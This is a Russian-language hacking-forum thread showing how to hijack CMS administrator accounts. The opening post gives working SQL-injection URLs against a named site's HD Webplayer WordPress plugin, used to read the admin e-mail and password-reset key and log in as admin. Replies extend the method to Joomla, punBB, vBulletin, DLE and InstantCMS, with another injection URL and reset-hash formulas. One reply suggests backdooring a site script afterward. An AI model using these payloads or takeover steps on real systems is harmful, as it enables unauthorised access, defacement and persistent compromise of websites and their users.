![]() |
Приветствую. Решил написать небольшую заметку.
Как вы знаете чтобы зайти в админ-панель Wordpress, нужно расшифровать хэш администратора. Но я понял как входить в панель без ожидания расшифровки хэша. Покажу на примере. У нас есть блог, где мы уже вывели данные из таблицы wp_users. Торопится выводить пароль не стоит, выведем e-mail администратора: Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_emai),5,6,7,8,9,10,11+from+wp_users--Цитата:
Вводим e-mail администратора который мы получили выше, и отправляем письмо. Пол дела мы сделали. Особенность Wordpress такова, что код подтверждения записывается в БД. Делаем такой запрос: Код:
http://www.abbdi.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3+union+select+1,2,3,group_concat(user_login,0x3a,user_activation_key),5,6,7,8,9,10,11+from+wp_users--Цитата:
Код:
www.abbdi.com/wp-login.php?action=rp&key=P6rd7g1bPW28zgbPCRtZ&login=adminДалее привычная авторизация. Ну вот и все. Есть некоторое примечание, этот способ может не работать на тех блогах, где отключен mail(). Способ работает не везде. (с) MaxFast |
Аммм...сорри ТС а для какой версии WP?
И как получить хэш для версии 3.4.1 |
Цитата:
Все данные я вытянул с помощью SQL Injection в плагине. |
Цитата:
|
ТС скажи пожайлуста как я понял то даже хеша пароля не нужно знать?
|
Цитата:
Главное узнать e-mail, и активационный код. |
Цитата:
|
Цитата:
|
Цитата:
|
Хм спасибо извлек для себя новое)А по поводу палева-если цель не очень то может и админ оказаться не совсем компетентным просто вернуть пасс обратно и забэкдорить какой нить скрипт авось и не заметит)
А если какойнибудь крупный сайт то тут уж и денег не жалко ящик его проспамить. Лови +++ |
Кстати а как с джумлой обстоят дела?Там же тоже должно катить.
|
Данный способ подходит для большого числа CMS и движков, за исключением тех, которые высылают на e-mail сам пароль.
|
Цитата:
Цитата:
|
Плагин HD Webplayer далеко не везде установлен. Но за способ +.
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Тут совершенно неважно какая бага, тут только прочитать данные из поля нужно, и все. |
Ааааааа, ну зачем-зачем-зачем ты спалил!!
Цитата:
|
ну раз с WP раскрылась тема то и до джумлы доберутся)
вообщем в таблице юзеров есть такая колонка "activation" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "521608068f705c84e225b8bc30e387d6:$1$e47b7a03$" на почту пришел такой хешь "985255f8d4bbe03c95ec3b144fc43da8" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить! форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confir m |
Цитата:
|
Короче походу все мои исследования, что я по ретриву проводил пора выкидывать в мусорку... Дальше так и пойдёт....
|
Цитата:
|
продолжу тему раз уж нато пошло
форум punBB 1.3.4 PHP код:
Цитата:
PHP код:
PHP код:
Цитата:
Цитата:
|
Тогда можно переименовать тему, и посвятить ее способам на других CMS.
|
Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
|
Да можно создать тему
|
Цитата:
|
переносите тему в ветку уязвимости.
BigBear'у теперь некогда этим заниматься, а тема не должна затеряться. |
Способ так-же подходит для VB - при восстановлении устанавливается новый 8-ми символьный цифровой пароль, который сбрутить не составит труда, хэши в ссылке на восстановление не используются.
Потом хэш можно вернуть на изначальный, только вот письмо из почты админа никуда не денется, хотя возможно в других двигах есть свои нюансы. |
Версию не уточнял!
DLE: 1) http://site/?do=lostpassword (via email) 2) use bug: http://site/script.php?video=-49674'+union+select+1,2,lostid,4,5,6,7+from+dle_lo stdb+where+lostname='1'--+ В данном случае, lostname - это ID пользователя - обычно админ 3)переход по линку: http://site/index.php?do=lostpassword&action=password&douser=1 &lostid=a05e0f74df705f0a1e3ab0803f82a7fd046214d 5 4) Генерится 11 символьный пароль из loweralpha и digit. Причем, есть шанс, что сгенеренный пароль будет only 11 digit's P.S Лично у меня 11 lenght DIGIT simblols EGB обходит перебором за пару минут. Instant CMS v1.9 CСсылка формируется согласно шаблону: Query - SELECT *, DATE_FORMAT(logdate, '%d-%m-%Y-%H-%i-%s') as logdate FROM cms_users WHERE email = 'email' LIMIT 1 Непосредственно вычисление хеша: $usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate']); В результате прямой линк на сброс пароля принимает вид: http://site/registration/remind/bbd4da8d02433a6bdea3d3019458f951 Далее в форме вводим новый пароль:подтверждение. P.S. В stable что лежит на офф сайте код в алгоритм формирования ссылки в конец добавляется константа PATH ( $_SERVER['DOCUMENT_ROOT']) Like this: $usercode = md5($usr['id'] . '-' . $usr['login'] . '-' . $usr['password'] . '-' . $usr['logdate'].PATH); |
wp 3.4.2. прокатило
|
WP 3.9.1 и выше (может и ниже) - ключ активации хешируется.
20 символов [a-zA-Z0-9] - проще хеш админа подобрать... |
| Время: 20:38 |